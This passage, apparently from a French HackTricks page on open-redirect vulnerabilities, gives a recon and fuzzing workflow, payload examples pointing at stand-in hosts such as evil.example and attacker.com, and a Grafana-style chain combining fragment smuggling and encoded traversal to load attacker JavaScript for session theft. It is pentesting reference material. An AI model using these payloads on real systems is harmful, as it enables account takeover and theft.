2) Grep common parameters and normalize list

rg -NI “(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)” urls.txt
| sed ‘s/\r$//’ | sort -u > candidates.txt

3) Use OpenRedireX to fuzz with payload corpus

cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt

4) Manually verify interesting hits

awk ‘/30[1237]|Location:/I’ results.txt

</details>

- N’oubliez pas les sinks côté client dans les SPAs : cherchez window.location/assign/replace et les helpers des frameworks qui lisent query/hash et redirigent.

- Les frameworks introduisent souvent des footguns lorsque les destinations de redirection sont dérivées d'entrées non fiables (query params, Referer, cookies). Voir les notes Next.js sur les redirects et évitez les destinations dynamiques dérivées des entrées utilisateur.

<a class="content_ref" href="../network-services-pentesting/pentesting-web/nextjs.md"><span class="content_ref_label">NextJS</span></a>

- OAuth/OIDC flows : l'abus d'open redirectors conduit souvent à un account takeover en leaking authorization codes/tokens. Voir le guide dédié :

<a class="content_ref" href="./oauth-to-account-takeover.md"><span class="content_ref_label">OAuth to Account takeover</span></a>

- Les réponses serveur qui implémentent des redirections sans Location (meta refresh/JavaScript) sont toujours exploitables pour phishing et peuvent parfois être chainées. Grep for:
```html
<meta http-equiv="refresh" content="0;url=//evil.example">
<script>location = new URLSearchParams(location.search).get('next')</script>

Fragment smuggling + client-side traversal chain (Grafana-style bypass)

• Server-side gap (Go url.Parse + raw redirect): Les validators qui n’inspectent que URL.Path et ignorent URL.Fragment peuvent être trompés en plaçant l’hôte externe après #. Si le handler reconstruit ensuite Location à partir de la chaîne unsanitized, les fragments leak dans la cible du redirect. Exemple contre /user/auth-tokens/rotate:
• Request: GET /user/auth-tokens/rotate?redirectTo=/%23/..//\//attacker.com HTTP/1.1
• Parsing sees Path=/ and Fragment=/..//\//attacker.com, so regex + path.Clean() approve /, but the response emits Location: /\//attacker.com, acting as an open redirect.
• Client-side gap (validate decoded/cleaned, return original): Les helpers SPA qui décodent complètement un chemin (y compris ? double-encodé), retirent la query pour la validation, mais renvoient ensuite la chaîne originale, laissant les ../ encodés survivre. Le décodage ultérieur par le browser le transforme en un traversal vers n’importe quel endpoint same-origin (e.g., the redirect gadget). Payload pattern:
• /dashboard/script/%253f%2f..%2f..%2f..%2f..%2f..%2fuser/auth-tokens/rotate
• The validator checks /dashboard/script/ (no ..), returns the encoded string, and the browser walks to /user/auth-tokens/rotate.
• End-to-end XSS/ATO: enchaîner le traversal avec le fragment-smuggled redirect pour contraindre le dashboard script loader à fetcher l’attacker JS:

https://<grafana>/dashboard/script/%253f%2f..%2f..%2f..%2f..%2f..%2fuser%2fauth-tokens%2frotate%3fredirectTo%3d%2f%2523%2f..%2f%2f%5c%2fattacker.com%2fmodule.js

• Le path traversal atteint le rotate endpoint, qui émet un 302 vers attacker.com/module.js depuis le redirectTo dissimulé dans le fragment. Veillez à ce que l’origine de l’attaquant fournisse du JS avec des CORS permissifs afin que le navigateur l’exécute, aboutissant à session theft/account takeover.

Outils

• https://github.com/0xNanda/Oralyzer
• OpenRedireX – fuzzer pour détecter les open redirects. Exemple:

# Install
git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh

# Fuzz a list of candidate URLs (use FUZZ as placeholder)
cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50

Références

• Sur https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect vous trouverez des fuzzing lists.
• https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html
• https://github.com/cujanovic/Open-Redirect-Payloads
• https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a
• PortSwigger Web Security Academy – DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection
• OpenRedireX – Un fuzzer pour détecter les vulnérabilités open redirect: https://github.com/devanshbatham/OpenRedireX
• Grafana CVE-2025-6023 redirect + traversal bypass chain

Tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks

• Vérifiez les plans d’abonnement !
• Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
• Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépôts github.